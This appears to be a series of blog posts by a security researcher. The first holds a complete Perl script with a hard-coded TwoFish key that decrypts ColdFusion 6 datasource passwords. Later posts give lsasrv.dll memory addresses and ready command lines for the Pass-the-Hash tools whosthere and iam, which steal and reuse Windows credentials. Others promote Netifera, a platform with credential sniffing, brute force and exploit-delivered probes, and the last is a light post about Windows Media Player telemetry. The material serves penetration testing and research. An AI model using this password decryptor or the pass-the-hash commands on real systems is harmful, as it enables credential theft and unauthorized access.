How to decrypt Coldfusion v6 datasource passwords

Some time ago I made a blog post about how to decrypt datasource passwords for both coldfusion v7 and v8 (see http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html), this blog post is basically about the same but for ColdFusion v6.

DataSource passwords in v6 are stored in \lib\neo-query.xml as they were in v7, but this time the passwords are encrypted using a 16-bytes hard-coded key using the TwoFish encryption algorithm.

The code used to encrypt the passwords can be found in cfusion.jar, unzip the .jar file and look for it in \coldfusion\sql\TwoFishCryptor.class and \coldfusion\sql\TwoFish_Algorithm.class.

I wrote a quick perl script to decrypt these passwords (it requires Crypt::TwoFish which you can easily download using CPAN or manually), here it is:



# ColdFusion 6 neo-query.xml database passwords decryptor
# (c) Hernan Ochoa (hernan@gmail.com)

use Crypt::Twofish;

$key = "\x56\xbc\xca\x37\x94\x81\xa6\x17\x09\x59\xfa\xdb\xcc\xfd\x40\x1a";


print "ColdFusion 6 neo-query.xml database passwords decryptor\n";
print "by Hernan Ochoa (hernan\@gmail.com)\n\n";

if (($#ARGV+1) != 1) {
print "syntax: decryptcf6.pl \n";
print "example: decryptcf6.pl AABBCCDDEEFF00010203040506070809\n";
print "\n";
exit 0;
}

$data = @ARGV[0];
if ( length($data) != 32 ) {
print "ERROR: encrypted password must be 32-characters long!\n";
exit 0;
}

print "encrypted password: $data\n";

@chars = split '', $data;

$mybytes = "";

for( $i=0; $i<32; $i=$i+2) {
$mybytes = $mybytes . chr( ( hex(@chars[$i])*16 ) + hex( @chars[$i+1]) );

}

$cipher = Crypt::Twofish->new($key);

print "decrypted password: " . $cipher->decrypt($mybytes);
print "\n";



You can also download it here: http://www.hexale.org/tools/decryptcf6.tgz

List of Addresses for the Pass-the-Hash toolkit -a switch

Many people contact me frequently asking for the correct addresses to use with the -a switch of whosthere.exe and iam.exe for different versions of Windows, languages, etc.

Although I will continue answering these questions, I have put together a list of addresses for different versions of lsasrv.dll to make the process a little bit easier both for me and for you.

The list currently contains a low amount of addresses but It will grow eventually, your contributions are very welcome but please send me your lsasrv.dll along with the addresses because I need to verify the addresses are correct.

The file containing the list of addresses is very simple:

'sha1' is the sha1 hash of the lsasrv.dll. This is used to identify different versions of the DLL

'File version' and 'Language' are the version and language of lsasrv.dll

'addresses' are the addresses to use with the -a switch

So, basically, if you have a version of windows where whosthere.exe and iam.exe are not working, first try iam-alt.exe and whosthere-alt.exe, if that doesn't work or if you want to specifically use whosthere.exe and iam.exe calculate the sha1 hash of your lsasrv.dll file (located in c:\windows\system32\lsasrv.dll) and look it up in the list of addresses.

If you can't find it there, just email me your lsasrv.dll. I'll answer with the correct addresses and will add them to the list.

You can find the list of addresses here: http://www.hexale.org/pth/pth_addrs.txt

fix for whosthere/iam under XP SP3 with latest updates (May 2009)

In my last post I mentioned whosthere/iam were not working anymore with the latest updates for xp sp 3 (but iam-alt/whosthere-alt were still working).

Ok, I actually forgot I had added the -a switch to the tools to easily overcome this scenario :).

The only thing you have to do is load lsasrv.dll into IDA and run the passthehash.idc script included in the toolkit's source package and it will give you back the addresses you need to make whosthere/iam work.

For xp sp3 english with the latest patches the values are the following:

75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

so, just run

whosthere -a 75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

or

iam.exe [other options...] -a 75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

and both tools will work with the latest patches on xp sp3 english.

If you have a different version of windows just use the IDA .idc script or email me.

whosthere/iam not working with latest xp sp3 patches

Just wanted to give you a heads up:

whosthere.exe and iam.exe seem to not be working with all the latest patches for xp sp3 applied. Can't really say which patch caused the problem and it doesn't matter that much anyways.

The problem is apparently that the tools just can't find the memory addresses they need, based on which I assume fixing the issue is simply a matter of modifying the heuristics used to find these addresses. I'm already looking at this issue and will release a new version soon.

Meanwhile, the '-alt' versions of the tools (whosthere-alt.exe and iam-alt.exe) still work; so, if you encounter yourself with this problem, just use the -alt versions.

As always, feel free to email me if you have any other questions/problems.

Netifera Video - The Java Virtual Machine As Shellcode

Check this out, netifera is getting interesting:

"In this screencast we're going to look at some features we are working on for the next version of netifera.

The two main things we're going to demonstrate are geographical visualiation and the netifera probe which is a deployable software agent that makes it possible to run all netifera platform tools remotely as easily as running them locally.

We're going to install the probe on the netifera.com webserver, and we'll deply it like shellcode by injecting it directly into memory over the network, using an exploit".

The video and more information is available at:
http://blog.netifera.com

direck link to the video:
http://blog.netifera.com/video-the-java-virtual-machine-as-shellcode/

Netifera v1.0 released!

Check out the new version of Netifera! v1.0 has been released!.

Next is a description of the new features of this release:

Netifera is a new modular open source platform for creating network
security tools. This project provides many advantages for both
security developers and researchers who want to implement new tools as
well as the community of users of these tools.

http://netifera.com/download

Tools

* Full IPv6 support
* TCP and UDP network scanning
* Service detection
* Operating system identification
* Reverse DNS scanning
* DNS name brute forcing
* DNS zone transfer information gathering
* Geographical information about network addresses
* Authentication brute force attack (against HTTP, FTP,IMAP and POP3)
* Web crawler discovers applications, collects email addresses and
adds the site structure to the model
* Integrated terminal for connecting to and interacting with network services

Passive Tools

* Modular packet capture service
* Capture packets on multiple interfaces simultaneously
* Parse ’pcap’ format capture files as input to sniffing modules
* HTTP traffic analysis
* DNS information gathering from captured responses
* Network stack fingerprinting
* Service detection from captured banners and protocol packets
* Client application detection
* Credential sniffing for many protocols

Data Model

All information discovered by the netifera platform is persistently
stored in a workspace database. Our extension design allows for
developers to easily create their own data types and integrate them
into the platform.

User Interface

The platform provides an intuitive and professional quality graphical
user interface for using the tools written for our platform and
navigating the information they produce. Different tasks in our
application such as sniffing information from the network, or actively
collecting information by scanning networks, or exploring the local
environment of a remotely deployed probe (coming soon! ) each have a
specialized configuration of the user interface called a ’perspective’

Programming API

The netifera platform brings together high quality programming APIs
for tasks such as:

High performance asynchronous socket connection and communication
Link level packet capture and raw socket injection
802.11 monitor mode packet capture and injection (coming soon! )
Network protocol header construction and analysis (ethernet, ip, tcp, etc...)
Application layer protocol libraries (http, dns, ftp, etc...)

Download netifera 1.0 for LInux and Mac OS X from:

http://netifera.com/download

* Important * Remove older versions before installing
If you have any previous version installed, you must delete the entire
directory (or move it out of the way) before installing this version.
This version is not compatible with the workspaces created with
previous beta versions so you should remove the .netifera folder from your home
directory (rm -rf ~/.netifera)

Contact us
We need your feedback to improve netifera. If you have bugs to report,
trace backs, screen captures of failures, .log files, or comments
about anything that annoys you while using netifera send them to:

bugs@netifera.com

Thank you!

Microsoft wants to listen to music with me

I just installed Windows 7 Beta, I run Windows Media Player for the first time and I get the following dialog:


The default option is 'Recommended Settings' but I notice that it says 'send usage data from the Player to Microsoft' and I go 'nah..' and choose 'Custom settings' because it says 'Customize privacy,..'

I click 'Next' and the following dialog appears:


But mhmmm....I can't uncheck the 'I want to help make Microsoft software and services even better by sending Player usage data to Microsoft'...

I like it how they try to sell it to you... 'come on! help Microsoft make this software even better! helping is good! help! if you help you're a good person! heeeeeeeelp!' ...

I guess this is a 'conditioned' beta, you get to play with the software but only if you are willing to 'help'.. :) which is good, right? :)

It's a silly thing anyways, but I thought it was funny.